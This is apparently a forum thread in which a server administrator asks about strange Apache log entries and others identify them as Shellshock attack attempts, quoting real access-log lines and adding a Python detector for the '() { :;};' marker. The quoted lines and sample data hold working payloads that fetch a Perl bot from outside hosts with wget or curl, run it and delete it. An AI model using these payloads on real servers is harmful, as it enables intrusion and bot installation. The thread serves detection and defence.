Looks like someone trying to upload files to the server
I noticed this in my Apache error log.
I looked for this file that was uploaded but could not find it. How do I disable this, and/or what is this?
[Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80...
[Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
[Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response...
[Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
[Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
[Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
[Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 0K ...
[Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....
[Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 100% 118K=0.06s
[Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
[Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:
[Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3) malformed
[Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: % Total % Received % Xferd Average Speed Time Time Time Current
[Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Dload Upload Total Spent Left Speed
[Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
[Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101 7488
[Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 101 7488 0 0 39691 0 --:--:-- --:--:-- --:--:-- 59904
This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently. Log:
165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
Here's another one:
81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf lifesux.txt\\x22"
The telltale sign that a request is trying to exploit the shellshock vulnerability in your BASH shell is the function definition at the beginning: () { :; }
If you have an old version of BASH, update -- you might need to build from source unless your box is really new. There are lots of good sites out there that explain how to deal with shellshock. I found this one quite helpful:
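A defender-side check for the marker this answer describes, added here as an example rather than code from the thread: it parses combined-format access log lines (honouring Apache's \" and \x22 escapes), flags any request whose referer, user-agent or request line begins with a () { ... } function definition, and reports the source IP, the field it arrived in and the command that followed. The sample lines are constructed to mirror the two posted above, using documentation IPs and an .invalid host, and the pattern generalises slightly by accepting any function body rather than only :; .

```python
import re

# Apache combined log format. Quoted fields may contain escaped quotes (\" or \x22),
# as in the posted log lines, so each field is matched as (non-quote | escape)*.
FIELD = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    rf'"(?P<request>{FIELD})" (?P<status>\d{{3}}) \S+ '
    rf'"(?P<referer>{FIELD})" "(?P<agent>{FIELD})"$'
)
# Telltale Shellshock marker: a header value that begins with an exported function
# definition "() { ... }" (any body, not only ":;"); the command after the closing
# brace is captured as the payload so the admin can see what was attempted.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{[^}]*\}\s*;?\s*(?P<payload>.*)$')

def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not fit the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(line):
    """Return a finding for the first field carrying a Shellshock function definition, else None."""
    entry = parse_combined(line)
    if entry is None:
        return None
    for field in ("referer", "agent", "request"):
        m = SHELLSHOCK_RE.match(entry[field])
        if m:
            return {"ip": entry["ip"], "time": entry["time"], "status": entry["status"],
                    "field": field, "payload": m.group("payload")}
    return None

def scan(lines):
    """Run the check over an iterable of log lines and return one finding per matching line."""
    return [hit for hit in (find_shellshock(line) for line in lines) if hit]

# Constructed sample lines modelled on the ones posted above (documentation IPs and an
# .invalid host); the second line is an ordinary request that must not be flagged.
SAMPLE_LOG = [
    r'192.0.2.10 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" '
    r'"() { :;};/usr/bin/perl -e \'print \"X\";system(\"wget dl.example.invalid/jack.jpg -O /tmp/jack.jpg\");\'"',
    r'192.0.2.11 - - [03/Nov/2014:11:37:02 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'192.0.2.12 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 '
    r'"() { :;}; /bin/bash -c \x22cd /tmp;wget http://203.0.113.5/lifesux.txt;perl /tmp/lifesux.txt\x22" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} status={hit['status']} via {hit['field']}: {hit['payload']}")
```

Feed it your real access log with `scan(open("/var/log/apache2/access.log"))` (path assumed); the error-log lines posted in the question are the CGI output of such a payload and need the matching access-log entry to identify the source.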
Thanks guys for your answers. I will take a look.